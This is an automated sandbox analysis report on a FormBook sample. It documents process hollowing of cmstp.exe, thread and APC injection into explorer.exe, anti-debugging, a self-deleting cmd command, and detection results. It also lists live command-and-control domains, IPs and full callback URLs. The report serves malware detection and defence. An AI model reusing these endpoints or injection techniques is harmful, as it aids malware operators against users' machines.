          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AA61C mov eax, dword ptr fs:[00000030h]7_2_046AA61C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AA61C mov eax, dword ptr fs:[00000030h]7_2_046AA61C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04675210 mov eax, dword ptr fs:[00000030h]7_2_04675210
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04675210 mov ecx, dword ptr fs:[00000030h]7_2_04675210
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04675210 mov eax, dword ptr fs:[00000030h]7_2_04675210
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04675210 mov eax, dword ptr fs:[00000030h]7_2_04675210
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731608 mov eax, dword ptr fs:[00000030h]7_2_04731608
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A16E0 mov ecx, dword ptr fs:[00000030h]7_2_046A16E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046876E2 mov eax, dword ptr fs:[00000030h]7_2_046876E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2AE4 mov eax, dword ptr fs:[00000030h]7_2_046A2AE4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2ACB mov eax, dword ptr fs:[00000030h]7_2_046A2ACB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04748ED6 mov eax, dword ptr fs:[00000030h]7_2_04748ED6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A36CC mov eax, dword ptr fs:[00000030h]7_2_046A36CC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B8EC7 mov eax, dword ptr fs:[00000030h]7_2_046B8EC7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0472FEC0 mov eax, dword ptr fs:[00000030h]7_2_0472FEC0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046752A5 mov eax, dword ptr fs:[00000030h]7_2_046752A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046752A5 mov eax, dword ptr fs:[00000030h]7_2_046752A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046752A5 mov eax, dword ptr fs:[00000030h]7_2_046752A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046752A5 mov eax, dword ptr fs:[00000030h]7_2_046752A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046752A5 mov eax, dword ptr fs:[00000030h]7_2_046752A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F46A7 mov eax, dword ptr fs:[00000030h]7_2_046F46A7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04740EA5 mov eax, dword ptr fs:[00000030h]7_2_04740EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04740EA5 mov eax, dword ptr fs:[00000030h]7_2_04740EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04740EA5 mov eax, dword ptr fs:[00000030h]7_2_04740EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468AAB0 mov eax, dword ptr fs:[00000030h]7_2_0468AAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468AAB0 mov eax, dword ptr fs:[00000030h]7_2_0468AAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AFAB0 mov eax, dword ptr fs:[00000030h]7_2_046AFAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470FE87 mov eax, dword ptr fs:[00000030h]7_2_0470FE87
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AD294 mov eax, dword ptr fs:[00000030h]7_2_046AD294
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AD294 mov eax, dword ptr fs:[00000030h]7_2_046AD294
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467DB60 mov ecx, dword ptr fs:[00000030h]7_2_0467DB60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468FF60 mov eax, dword ptr fs:[00000030h]7_2_0468FF60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A3B7A mov eax, dword ptr fs:[00000030h]7_2_046A3B7A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A3B7A mov eax, dword ptr fs:[00000030h]7_2_046A3B7A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04748F6A mov eax, dword ptr fs:[00000030h]7_2_04748F6A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467DB40 mov eax, dword ptr fs:[00000030h]7_2_0467DB40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468EF40 mov eax, dword ptr fs:[00000030h]7_2_0468EF40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04748B58 mov eax, dword ptr fs:[00000030h]7_2_04748B58
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467F358 mov eax, dword ptr fs:[00000030h]7_2_0467F358
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04674F2E mov eax, dword ptr fs:[00000030h]7_2_04674F2E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04674F2E mov eax, dword ptr fs:[00000030h]7_2_04674F2E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AE730 mov eax, dword ptr fs:[00000030h]7_2_046AE730
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470FF10 mov eax, dword ptr fs:[00000030h]7_2_0470FF10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470FF10 mov eax, dword ptr fs:[00000030h]7_2_0470FF10
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.huongdandidong.com
          Source: C:\Windows\explorer.exeDomain query: www.opusleaf.com
          Source: C:\Windows\explorer.exeDomain query: www.luxel01.com
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 5.101.152.161 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.simplyhealrhcareplans.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 108.186.210.142 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.myboardinghome.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.223.115.185 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 144.76.207.76 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.seymor-law.com
          Source: C:\Windows\explorer.exeDomain query: www.muzhskoy-eskort.site
          Source: C:\Windows\explorer.exeDomain query: www.shopthen2.site
          Source: C:\Windows\explorer.exeNetwork Connect: 118.27.122.19 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lewishackney.com
          Source: C:\Windows\explorer.exeDomain query: www.ecomcourse.online
          Source: C:\Windows\explorer.exeDomain query: www.karizcustomizeme.com
          Source: C:\Windows\explorer.exeDomain query: www.anadelalastra.art
          Source: C:\Windows\explorer.exeDomain query: www.orchidandiris.com
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_737F1000 Hyvkfcorf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,0_2_737F1000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeSection loaded: unknown target: C:\Users\user\Desktop\LWlcpDjYIQ.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeThread register set: target process: 3388Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 3388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 220000Jump to behavior
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeProcess created: C:\Users\user\Desktop\LWlcpDjYIQ.exe 'C:\Users\user\Desktop\LWlcpDjYIQ.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'Jump to behavior
          Source: explorer.exe, 00000005.00000000.220055270.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.220307283.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000007.00000002.476143655.0000000002F00000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.220307283.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000007.00000002.476143655.0000000002F00000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.220307283.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000007.00000002.476143655.0000000002F00000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.220307283.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000007.00000002.476143655.0000000002F00000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion3Input Capture1Query Registry1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemorySecurity Software Discovery241Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion3SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383953 Sample: LWlcpDjYIQ.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 31 www.socialunified.com 2->31 33 www.kaashir.com 2->33 35 HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 5 other signatures 2->49 11 LWlcpDjYIQ.exe 18 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\Temp\...\9a5t.dll, PE32 11->29 dropped 59 Detected unpacking (changes PE section rights) 11->59 61 Maps a DLL or memory area into another process 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 65 Contains functionality to prevent local Windows debugging 11->65 15 LWlcpDjYIQ.exe 11->15         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 15->67 69 Maps a DLL or memory area into another process 15->69 71 Sample uses process hollowing technique 15->71 73 Queues an APC in another process (thread injection) 15->73 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.huongdandidong.com 108.186.210.142, 49731, 80 PEGTECHINCUS United States 18->37 39 www.luxel01.com 118.27.122.19, 49722, 80 INTERQGMOInternetIncJP Japan 18->39 41 17 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 cmstp.exe 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          LWlcpDjYIQ.exe66%ReversingLabsWin32.Trojan.Wacatac

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll24%ReversingLabsWin32.Trojan.Wacatac

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.cmstp.exe.45c708.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.cmstp.exe.4b87960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.LWlcpDjYIQ.exe.737f0000.6.unpack100%AviraHEUR/AGEN.1131513Download File
          2.1.LWlcpDjYIQ.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.LWlcpDjYIQ.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.huongdandidong.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=94GGx2Cs8EYqYWyk7qEtIIzRN3fkRhfUxg2Vtzz5w0QY/7xu41tS8mQoIQP3aceFOvfi0%Avira URL Cloudsafe
          www.simplyhealrhcareplans.com/sqra/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.simplyhealrhcareplans.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.socialunified.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=nD+8EQ/dkrvxrfeXfZTM4uqVidyysXGGAQQPcyuh+D+qYnXcwF5fcGHppY2Ae0Rizhob0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.lewishackney.com/sqra/?NBZl=RvvWc34iJhU4aDVvCPxlJYXQghZKjT+0jz617RLPtVuesnMs5OzQh/fCAeZj/K6zv/Ow&lzul=wRDL7BohbLBLJV100%Avira URL Cloudmalware
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.luxel01.com/sqra/?NBZl=l8gFWKa0VIasP4OX6UWILwSCtzkOc3V6oKupITn9HnPx0eDpBTl3az448bd8FGwLkJvi&lzul=wRDL7BohbLBLJV0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.orchidandiris.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=zH8yL9FtafuknHUuv+0OAb189SbLD7IfmvNkOBi8bJNQNfTK09EYjoUTP6M+ilwbYPXy0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.ecomcourse.online/sqra/?NBZl=A685XXlO5s8wdT2GSl4VwObxhyaN1usH/ZDf3g436hkZTbYdTSv6UxS6ZdhF3LcC3Fcd&lzul=wRDL7BohbLBLJV100%Avira URL Cloudmalware
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.karizcustomizeme.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.anadelalastra.art/sqra/?NBZl=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ&lzul=wRDL7BohbLBLJV0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.shopthen2.site/sqra/?lzul=wRDL7BohbLBLJV&NBZl=0hvqTGsG2LXykKa15oAG/2YmS9ez8HJt/56JneCT4XqEJpzhFqXtEbyiFIIf71vevGG90%Avira URL Cloudsafe
          http://www.muzhskoy-eskort.site/sqra/?NBZl=XY+ZErIRkQWtvrbZzW/Q2VqSgxI2oDXvZ0FX1dCtO5jFwgiNlKUf7p0wm51D3p8eN5aQ&lzul=wRDL7BohbLBLJV100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ecomcourse.online
          		184.168.131.241
          		truetrue
            		unknown
            www.huongdandidong.com
            		108.186.210.142
            		truetrue
              		unknown
              www.muzhskoy-eskort.site
              		144.76.207.76
              		truetrue
                		unknown
                karizcustomizeme.com
                		160.153.136.3
                		truetrue
                  		unknown
                  www.shopthen2.site
                  		5.101.152.161
                  		truetrue
                    		unknown
                    www.luxel01.com
                    		118.27.122.19
                    		truetrue
                      		unknown
                      orchidandiris.com
                      		34.102.136.180
                      		truefalse
                        		unknown
                        HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com
                        		3.223.115.185
                        		truefalse
                          		high
                          www.simplyhealrhcareplans.com
                          		199.59.242.153
                          		truetrue
                            		unknown
                            lewishackney.com
                            		34.102.136.180
                            		truefalse
                              		unknown
                              www.kaashir.com
                              		208.91.197.27
                              		truetrue
                                		unknown
                                ext-sq.squarespace.com
                                		198.185.159.144
                                		truefalse
                                  		high
                                  www.opusleaf.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.myboardinghome.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.socialunified.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.seymor-law.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.lewishackney.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.ecomcourse.online
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.karizcustomizeme.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.anadelalastra.art
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.orchidandiris.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.huongdandidong.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=94GGx2Cs8EYqYWyk7qEtIIzRN3fkRhfUxg2Vtzz5w0QY/7xu41tS8mQoIQP3aceFOvfitrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    www.simplyhealrhcareplans.com/sqra/true
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    http://www.simplyhealrhcareplans.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoKtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.socialunified.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=nD+8EQ/dkrvxrfeXfZTM4uqVidyysXGGAQQPcyuh+D+qYnXcwF5fcGHppY2Ae0Rizhobtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.lewishackney.com/sqra/?NBZl=RvvWc34iJhU4aDVvCPxlJYXQghZKjT+0jz617RLPtVuesnMs5OzQh/fCAeZj/K6zv/Ow&lzul=wRDL7BohbLBLJVfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.luxel01.com/sqra/?NBZl=l8gFWKa0VIasP4OX6UWILwSCtzkOc3V6oKupITn9HnPx0eDpBTl3az448bd8FGwLkJvi&lzul=wRDL7BohbLBLJVtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.orchidandiris.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=zH8yL9FtafuknHUuv+0OAb189SbLD7IfmvNkOBi8bJNQNfTK09EYjoUTP6M+ilwbYPXyfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.ecomcourse.online/sqra/?NBZl=A685XXlO5s8wdT2GSl4VwObxhyaN1usH/ZDf3g436hkZTbYdTSv6UxS6ZdhF3LcC3Fcd&lzul=wRDL7BohbLBLJVtrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.karizcustomizeme.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iytrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.anadelalastra.art/sqra/?NBZl=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ&lzul=wRDL7BohbLBLJVtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.shopthen2.site/sqra/?lzul=wRDL7BohbLBLJV&NBZl=0hvqTGsG2LXykKa15oAG/2YmS9ez8HJt/56JneCT4XqEJpzhFqXtEbyiFIIf71vevGG9true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.muzhskoy-eskort.site/sqra/?NBZl=XY+ZErIRkQWtvrbZzW/Q2VqSgxI2oDXvZ0FX1dCtO5jFwgiNlKUf7p0wm51D3p8eN5aQ&lzul=wRDL7BohbLBLJVtrue
                                                    • Avira URL Cloud: malware
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
